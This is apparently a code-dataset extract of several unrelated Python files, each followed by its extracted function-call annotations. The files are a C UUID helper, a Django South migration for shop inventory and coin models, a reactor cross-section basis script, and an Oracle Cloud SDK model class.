| [((31964, 31979), 'docopt.docopt', 'docopt', (['__doc__'], {}), '(__doc__)\n', (31970, 31979), False, 'from docopt import docopt\n'), ((32611, 32641), 'os.path.realpath', 'os.path.realpath', (['project_path'], {}), '(project_path)\n', (32627, 32641), False, 'import os\n'), ((32046, 32074), 'os.path.isfile', 'os.path.isfile', (['project_path'], {}), '(project_path)\n', (32060, 32074), False, 'import os\n'), ((33612, 33650), 'os.path.dirname', 'os.path.dirname', (['uvp.project_file_path'], {}), '(uvp.project_file_path)\n', (33627, 33650), False, 'import os\n'), ((8140, 8175), 'os.path.splitext', 'os.path.splitext', (['project_file_path'], {}), '(project_file_path)\n', (8156, 8175), False, 'import os\n'), ((22374, 22405), 'os.path.basename', 'os.path.basename', (['file.instance'], {}), '(file.instance)\n', (22390, 22405), False, 'import os\n'), ((24352, 24369), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (24363, 24369), False, 'from collections import defaultdict\n'), ((32089, 32113), 'os.scandir', 'os.scandir', (['project_path'], {}), '(project_path)\n', (32099, 32113), False, 'import os\n'), ((29383, 29411), 'operator.attrgetter', 'operator.attrgetter', (['"""value"""'], {}), "('value')\n", (29402, 29411), False, 'import operator\n'), ((8404, 8418), 'lxml.etree.parse', 'etree.parse', (['f'], {}), '(f)\n', (8415, 8418), False, 'from lxml import etree\n'), ((8556, 8570), 'lxml.etree.parse', 'etree.parse', (['f'], {}), '(f)\n', (8567, 8570), False, 'from lxml import etree\n'), ((22072, 22210), 'warnings.warn', 'warnings.warn', (['f"""Inconsistent group number {group.files[0].group_number} for group {group.name} (expected to be {group_number})"""'], {}), "(\n f'Inconsistent group number {group.files[0].group_number} for group {group.name} (expected to be {group_number})'\n )\n", (22085, 22210), False, 'import warnings\n'), ((27135, 27142), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (27139, 27142), False, 'from pathlib import Path\n'), ((33702, 33741), 'os.path.basename', 'os.path.basename', (['uvp.project_file_path'], {}), '(uvp.project_file_path)\n', (33718, 33741), False, 'import os\n'), ((23462, 23493), 'os.path.basename', 'os.path.basename', (['file.instance'], {}), '(file.instance)\n', (23478, 23493), False, 'import os\n'), ((22881, 22946), 'warnings.warn', 'warnings.warn', (['f"""Unknown RTE file type \'{file.instance}\': {file}"""'], {}), '(f"Unknown RTE file type \'{file.instance}\': {file}")\n', (22894, 22946), False, 'import warnings\n'), ((24724, 24787), 'warnings.warn', 'warnings.warn', (['f"""Unsupported file type: {file.type} for {file}"""'], {}), "(f'Unsupported file type: {file.type} for {file}')\n", (24737, 24787), False, 'import warnings\n'), ((32220, 32245), 'os.path.splitext', 'os.path.splitext', (['de.name'], {}), '(de.name)\n', (32236, 32245), False, 'import os\n')] |
#!/usr/bin/python
"""
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import ctypes
import uuid
def c_uuid_to_str(uuid):
""" utility function to convert a C uuid into a standard string format """
uuid_str = '{:02X}{:02X}{:02X}{:02X}-{:02X}{:02X}-{:02X}{:02X}-{:02X}'\
'{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X}'.format(
uuid[0], uuid[1], uuid[2], uuid[3], uuid[4], uuid[5],
uuid[6], uuid[7], uuid[8], uuid[9], uuid[10], uuid[11],
uuid[12], uuid[13], uuid[14], uuid[15])
return uuid_str
def c_uuid(p_uuid, c_uuid):
""" utility function to create a UUID in C format from a python UUID """
hexstr = p_uuid.hex
for i in range(0, 31, 2):
c_uuid[int(i/2)] = int(hexstr[i:i+2], 16)
def str_to_c_uuid(uuidstr):
""" utility function to convert string format uuid to a C uuid """
uuidstr2 = '{' + uuidstr + '}'
puuid = uuid.UUID(uuidstr2)
cuuid = (ctypes.c_ubyte * 16)()
c_uuid(puuid, cuuid)
return cuuid
| [
"uuid.UUID"
]
| [((1866, 1885), 'uuid.UUID', 'uuid.UUID', (['uuidstr2'], {}), '(uuidstr2)\n', (1875, 1885), False, 'import uuid\n')] |
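For context, a small round-trip check of the three helpers in the sample above; a minimal sketch that assumes the functions are in scope (for example, run in the same module) and relies only on the code shown.
import uuid
# Canonical string -> C-style 16-byte array -> canonical string.
original = str(uuid.uuid4())
cuuid = str_to_c_uuid(original)
assert c_uuid_to_str(cuuid).lower() == original.lower()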
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
| [
"south.db.db.send_create_signal",
"south.db.db.delete_table"
]
| [((389, 440), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['ProductType']"], {}), "('inventory', ['ProductType'])\n", (410, 440), False, 'from south.db import db\n'), ((1480, 1527), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['Product']"], {}), "('inventory', ['Product'])\n", (1501, 1527), False, 'from south.db import db\n'), ((3794, 3838), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['Coin']"], {}), "('inventory', ['Coin'])\n", (3815, 3838), False, 'from south.db import db\n'), ((3927, 3967), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_producttype"""'], {}), "('inventory_producttype')\n", (3942, 3967), False, 'from south.db import db\n'), ((4012, 4048), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_product"""'], {}), "('inventory_product')\n", (4027, 4048), False, 'from south.db import db\n'), ((4090, 4123), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_coin"""'], {}), "('inventory_coin')\n", (4105, 4123), False, 'from south.db import db\n')] |
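A side note on the self.gf(...) calls used throughout forwards(): each one resolves a dotted path to the field class it names. The helper below is not South's implementation, only an illustrative stand-in for the idea; resolve_dotted is a hypothetical name.
from importlib import import_module
def resolve_dotted(path):
    """Illustrative stand-in for self.gf(): map a dotted path such as
    'django.db.models.fields.CharField' to the class it names."""
    module_path, _, attr = path.rpartition('.')
    return getattr(import_module(module_path), attr)
# resolve_dotted('django.db.models.fields.CharField')(max_length=200)
# mirrors the shape of the gf(...) calls in forwards() above.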
import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| [
"sph_dgm.DGMSOLVER",
"coarseBounds.computeBounds",
"makeDLPbasis.makeBasis",
"pydgm.dgmsolver.initialize_dgmsolver",
"pydgm.control.finalize_control",
"numpy.cumsum",
"sph_dgm.XS",
"sys.path.append",
"makeKLTbasis.makeBasis",
"pydgm.dgmsolver.finalize_dgmsolver",
"numpy.set_printoptions"
]
| [((30, 84), 'sys.path.append', 'sys.path.append', (['"""/homes/rlreed/workspace/unotran/src"""'], {}), "('/homes/rlreed/workspace/unotran/src')\n", (45, 84), False, 'import sys\n'), ((612, 625), 'numpy.cumsum', 'np.cumsum', (['cm'], {}), '(cm)\n', (621, 625), True, 'import numpy as np\n'), ((1025, 1101), 'sph_dgm.DGMSOLVER', 'sph_dgm.DGMSOLVER', (['G', 'fname', 'fm', 'cm', 'mm', 'nPin', 'dgmstructure'], {'solveFlag': '(False)'}), '(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)\n', (1042, 1101), False, 'import sph_dgm\n'), ((1106, 1144), 'pydgm.dgmsolver.initialize_dgmsolver', 'pydgm.dgmsolver.initialize_dgmsolver', ([], {}), '()\n', (1142, 1144), False, 'import pydgm\n'), ((1172, 1208), 'pydgm.dgmsolver.finalize_dgmsolver', 'pydgm.dgmsolver.finalize_dgmsolver', ([], {}), '()\n', (1206, 1208), False, 'import pydgm\n'), ((1213, 1245), 'pydgm.control.finalize_control', 'pydgm.control.finalize_control', ([], {}), '()\n', (1243, 1245), False, 'import pydgm\n'), ((1306, 1375), 'sph_dgm.XS', 'sph_dgm.XS', (['G', 'nCellPerPin', 'dgm.sig_t', 'dgm.vsig_f', 'dgm.chi', 'dgm.sig_s'], {}), '(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)\n', (1316, 1375), False, 'import sph_dgm\n'), ((1408, 1440), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(6)'}), '(precision=6)\n', (1427, 1440), True, 'import numpy as np\n'), ((1473, 1514), 'coarseBounds.computeBounds', 'computeBounds', (['G', '"""full"""', '(1)', '(0.0)', '(1.3)', '(60)'], {}), "(G, 'full', 1, 0.0, 1.3, 60)\n", (1486, 1514), False, 'from coarseBounds import computeBounds, Grouping\n'), ((742, 774), 'makeKLTbasis.makeBasis', 'makeKLT', (['basisType', 'dgmstructure'], {}), '(basisType, dgmstructure)\n', (749, 774), True, 'from makeKLTbasis import makeBasis as makeKLT\n'), ((793, 814), 'makeDLPbasis.makeBasis', 'makeDLP', (['dgmstructure'], {}), '(dgmstructure)\n', (800, 814), True, 'from makeDLPbasis import makeBasis as makeDLP\n')] |
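A quick sanity check of buildGEO() from the script above. It must run alongside the definitions above, which provide buildGEO and np; the two-pin layout is illustrative.
npins, fm, cm, mm = buildGEO([0, 1])
assert npins == 2          # one entry per assembly/pin index
assert fm == [1, 1]        # fine mesh repeated per pin
assert mm == [1, 2]        # materials looked up from material_map
assert np.allclose(cm, [0.0, 1.26, 2.52])   # cumulative coarse-mesh edges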
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| [
"oci.util.formatted_flat_dict",
"oci.util.value_allowed_none_or_none_sentinel"
]
